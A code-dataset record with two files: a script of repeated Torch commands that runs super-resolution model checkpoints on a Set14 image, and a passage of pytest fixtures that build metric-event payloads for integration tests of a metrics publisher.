2019-05-28T03:17:07.000Z
|
2019-09-24T08:18:13.000Z
|
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | null | null | null |
tools/paper_test.py
|
huaer9258/SRDN
|
e5cfec029942088523550cc62f47e6f6519a6474
|
[
"MIT"
] | null | null | null |
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic1_densenetfft.png -model ./paper_test/densenet_fft_1.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic2_densenetfft.png -model ./paper_test/densenet_fft_2.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic3_densenetfft.png -model ./paper_test/densenet_fft_3.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic4_densenetfft.png -model ./paper_test/densenet_fft_4.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic5_densenetfft.png -model ./paper_test/densenet_fft_5.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic6_densenetfft.png -model ./paper_test/densenet_fft_6.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic7_densenetfft.png -model ./paper_test/densenet_fft_7.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic8_densenetfft.png -model ./paper_test/densenet_fft_8.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic9_densenetfft.png -model ./paper_test/densenet_fft_9.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic10_densenetfft.png -model ./paper_test/densenet_fft_10.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic11_densenetfft.png -model ./paper_test/densenet_fft_11.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic12_densenetfft.png -model ./paper_test/densenet_fft_12.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic13_densenetfft.png -model ./paper_test/densenet_fft_13.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic14_densenetfft.png -model ./paper_test/densenet_fft_14.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic15_densenetfft.png -model ./paper_test/densenet_fft_15.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic16_densenetfft.png -model ./paper_test/densenet_fft_16.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic17_densenetfft.png -model ./paper_test/densenet_fft_17.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic18_densenetfft.png -model ./paper_test/densenet_fft_18.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic19_densenetfft.png -model ./paper_test/densenet_fft_19.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic20_densenetfft.png -model ./paper_test/densenet_fft_20.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic21_densenetfft.png -model ./paper_test/densenet_fft_21.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic22_densenetfft.png -model ./paper_test/densenet_fft_22.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic23_densenetfft.png -model ./paper_test/densenet_fft_23.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic24_densenetfft.png -model ./paper_test/densenet_fft_24.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic25_densenetfft.png -model ./paper_test/densenet_fft_25.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic26_densenetfft.png -model ./paper_test/densenet_fft_26.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic27_densenetfft.png -model ./paper_test/densenet_fft_27.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic28_densenetfft.png -model ./paper_test/densenet_fft_28.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic29_densenetfft.png -model ./paper_test/densenet_fft_29.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic30_densenetfft.png -model ./paper_test/densenet_fft_30.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic31_densenetfft.png -model ./paper_test/densenet_fft_31.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic32_densenetfft.png -model ./paper_test/densenet_fft_32.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic33_densenetfft.png -model ./paper_test/densenet_fft_33.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic34_densenetfft.png -model ./paper_test/densenet_fft_34.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic35_densenetfft.png -model ./paper_test/densenet_fft_35.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic36_densenetfft.png -model ./paper_test/densenet_fft_36.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic37_densenetfft.png -model ./paper_test/densenet_fft_37.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic38_densenetfft.png -model ./paper_test/densenet_fft_38.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic39_densenetfft.png -model ./paper_test/densenet_fft_39.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic40_densenetfft.png -model ./paper_test/densenet_fft_40.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic41_densenetfft.png -model ./paper_test/densenet_fft_41.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic42_densenetfft.png -model ./paper_test/densenet_fft_42.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic43_densenetfft.png -model ./paper_test/densenet_fft_43.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic44_densenetfft.png -model ./paper_test/densenet_fft_44.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic45_densenetfft.png -model ./paper_test/densenet_fft_45.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic46_densenetfft.png -model ./paper_test/densenet_fft_46.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic47_densenetfft.png -model ./paper_test/densenet_fft_47.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic48_densenetfft.png -model ./paper_test/densenet_fft_48.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic49_densenetfft.png -model ./paper_test/densenet_fft_49.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic50_densenetfft.png -model ./paper_test/densenet_fft_50.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic51_densenetfft.png -model ./paper_test/densenet_fft_51.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic52_densenetfft.png -model ./paper_test/densenet_fft_52.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic53_densenetfft.png -model ./paper_test/densenet_fft_53.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic54_densenetfft.png -model ./paper_test/densenet_fft_54.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic55_densenetfft.png -model ./paper_test/densenet_fft_55.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic56_densenetfft.png -model ./paper_test/densenet_fft_56.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic57_densenetfft.png -model ./paper_test/densenet_fft_57.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic58_densenetfft.png -model ./paper_test/densenet_fft_58.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic59_densenetfft.png -model ./paper_test/densenet_fft_59.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic60_densenetfft.png -model ./paper_test/densenet_fft_60.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic61_densenetfft.png -model ./paper_test/densenet_fft_61.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic62_densenetfft.png -model ./paper_test/densenet_fft_62.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic63_densenetfft.png -model ./paper_test/densenet_fft_63.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic1_densenet_.png -model ./checkpoint_densenet_final/test4_1.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic2_densenet_.png -model ./checkpoint_densenet_final/test4_2.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic3_densenet_.png -model ./checkpoint_densenet_final/test4_3.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic4_densenet_.png -model ./checkpoint_densenet_final/test4_4.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic5_densenet_.png -model ./checkpoint_densenet_final/test4_5.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic6_densenet_.png -model ./checkpoint_densenet_final/test4_6.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic7_densenet_.png -model ./checkpoint_densenet_final/test4_7.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic8_densenet_.png -model ./checkpoint_densenet_final/test4_8.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic9_densenet_.png -model ./checkpoint_densenet_final/test4_9.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic10_densenet_.png -model ./checkpoint_densenet_final/test4_10.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic11_densenet_.png -model ./checkpoint_densenet_final/test4_11.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic12_densenet_.png -model ./checkpoint_densenet_final/test4_12.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic13_densenet_.png -model ./checkpoint_densenet_final/test4_13.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic14_densenet_.png -model ./checkpoint_densenet_final/test4_14.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic15_densenet_.png -model ./checkpoint_densenet_final/test4_15.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic16_densenet_.png -model ./checkpoint_densenet_final/test4_16.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic17_densenet_.png -model ./checkpoint_densenet_final/test4_17.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic18_densenet_.png -model ./checkpoint_densenet_final/test4_18.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic19_densenet_.png -model ./checkpoint_densenet_final/test4_19.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic20_densenet_.png -model ./checkpoint_densenet_final/test4_20.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic21_densenet_.png -model ./checkpoint_densenet_final/test4_21.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic22_densenet_.png -model ./checkpoint_densenet_final/test4_22.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic23_densenet_.png -model ./checkpoint_densenet_final/test4_23.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic24_densenet_.png -model ./checkpoint_densenet_final/test4_24.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic25_densenet_.png -model ./checkpoint_densenet_final/test4_25.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic26_densenet_.png -model ./checkpoint_densenet_final/test4_26.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic27_densenet_.png -model ./checkpoint_densenet_final/test4_27.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic28_densenet_.png -model ./checkpoint_densenet_final/test4_28.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic29_densenet_.png -model ./checkpoint_densenet_final/test4_29.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic30_densenet_.png -model ./checkpoint_densenet_final/test4_30.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic31_densenet_.png -model ./checkpoint_densenet_final/test4_31.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic32_densenet_.png -model ./checkpoint_densenet_final/test4_32.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic33_densenet_.png -model ./checkpoint_densenet_final/test4_33.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic34_densenet_.png -model ./checkpoint_densenet_final/test4_34.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic35_densenet_.png -model ./checkpoint_densenet_final/test4_35.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic36_densenet_.png -model ./checkpoint_densenet_final/test4_36.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic37_densenet_.png -model ./checkpoint_densenet_final/test4_37.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic38_densenet_.png -model ./checkpoint_densenet_final/test4_38.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic39_densenet_.png -model ./checkpoint_densenet_final/test4_39.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic40_densenet_.png -model ./checkpoint_densenet_final/test4_40.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic41_densenet_.png -model ./checkpoint_densenet_final/test4_41.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic42_densenet_.png -model ./checkpoint_densenet_final/test4_42.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic43_densenet_.png -model ./checkpoint_densenet_final/test4_43.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic44_densenet_.png -model ./checkpoint_densenet_final/test4_44.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic45_densenet_.png -model ./checkpoint_densenet_final/test4_45.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic46_densenet_.png -model ./checkpoint_densenet_final/test4_46.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic47_densenet_.png -model ./checkpoint_densenet_final/test4_47.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic48_densenet_.png -model ./checkpoint_densenet_final/test4_48.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic49_densenet_.png -model ./checkpoint_densenet_final/test4_49.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic50_densenet_.png -model ./checkpoint_densenet_final/test4_50.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic51_densenet_.png -model ./checkpoint_densenet_final/test4_51.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic52_densenet_.png -model ./checkpoint_densenet_final/test4_52.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic53_densenet_.png -model ./checkpoint_densenet_final/test4_53.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic54_densenet_.png -model ./checkpoint_densenet_final/test4_54.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic55_densenet_.png -model ./checkpoint_densenet_final/test4_55.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic56_densenet_.png -model ./checkpoint_densenet_final/test4_56.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic57_densenet_.png -model ./checkpoint_densenet_final/test4_57.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic58_densenet_.png -model ./checkpoint_densenet_final/test4_58.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic59_densenet_.png -model ./checkpoint_densenet_final/test4_59.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic60_densenet_.png -model ./checkpoint_densenet_final/test4_60.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic61_densenet_.png -model ./checkpoint_densenet_final/test4_61.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic62_densenet_.png -model ./checkpoint_densenet_final/test4_62.t7
th test_origin.lua -img /mnt/lvm/xiaojie/SelfExSR/data/Set14/image_SRF_4/img_005_SRF_4_LR.png -output ./paper_test_img/comic63_densenet_.png -model ./checkpoint_densenet_final/test4_63.t7
| 182.403101
| 189
| 0.833829
| 4,284
| 23,530
| 4.182773
| 0.035481
| 0.056253
| 0.08438
| 0.105475
| 0.999665
| 0.999665
| 0.999665
| 0.707852
| 0.707852
| 0.707852
| 0
| 0.069119
| 0.053719
| 23,530
| 128
| 190
| 183.828125
| 0.735651
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
080c4326521d6493c51de6ab224a7a632c326f61
| 8,575
|
py
|
Python
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 10
|
2018-08-02T19:27:59.000Z
|
2021-07-12T18:39:01.000Z
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 1
|
2020-02-19T15:15:43.000Z
|
2020-02-20T12:47:53.000Z
|
test/integration/events.py
|
awslabs/aws-serverless-metrics-publisher
|
1a0a2d444ae634d0b0e4314a2ee9b748f1aad9ea
|
[
"MIT-0"
] | 7
|
2018-10-04T04:33:28.000Z
|
2021-09-02T17:50:25.000Z
|
"""Collection of events for integration tests."""
import pytest
import uuid
import time
@pytest.fixture()
def input_events():
new_uuid = str(uuid.uuid4())
request_id = "request_id_" + new_uuid
input_1 = {
"request_id": request_id,
"metric_data": [
{
"metric_name": "theMetricName1",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"value":50,
}
]
}
new_uuid = str(uuid.uuid4())
request_id = "request_id_" + new_uuid
input_2 = {
"request_id": request_id,
"metric_data": [
{
"metric_name": "theMetricName2",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"value":25
},
{
"metric_name": "theMetricName2",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"value":35
}
]
}
new_uuid = str(uuid.uuid4())
request_id = "request_id_" + new_uuid
input_3 = {
"request_id": request_id,
"metric_data": [
{
"metric_name": "theMetricName3",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"statistic_values": {
"sample_count": 5,
"sum": 217,
"minimum": 1,
"maximum": 555
}
}
]
}
new_uuid = str(uuid.uuid4())
request_id = "request_id_" + new_uuid
the_data = []
for i in range(20):
single_point = {
"metric_name": "theMetricName4",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"value": 42
}
the_data.append(single_point)
input_4 = {
"request_id": request_id,
"metric_data": the_data
}
new_uuid = str(uuid.uuid4())
request_id = "request_id_" + new_uuid
the_data = []
for i in range(10):
single_point = {
"metric_name": "theMetricName4",
"dimensions": [
{
"name": "test_name",
"value": "test_value"
}
],
"timestamp": time.time(),
"value": 39
}
the_data.append(single_point)
input_5 = {
"request_id": request_id,
"metric_data": the_data
}
return [input_1, input_2, input_3, input_4, input_5]
@pytest.fixture()
def sample_queries():
return [
{
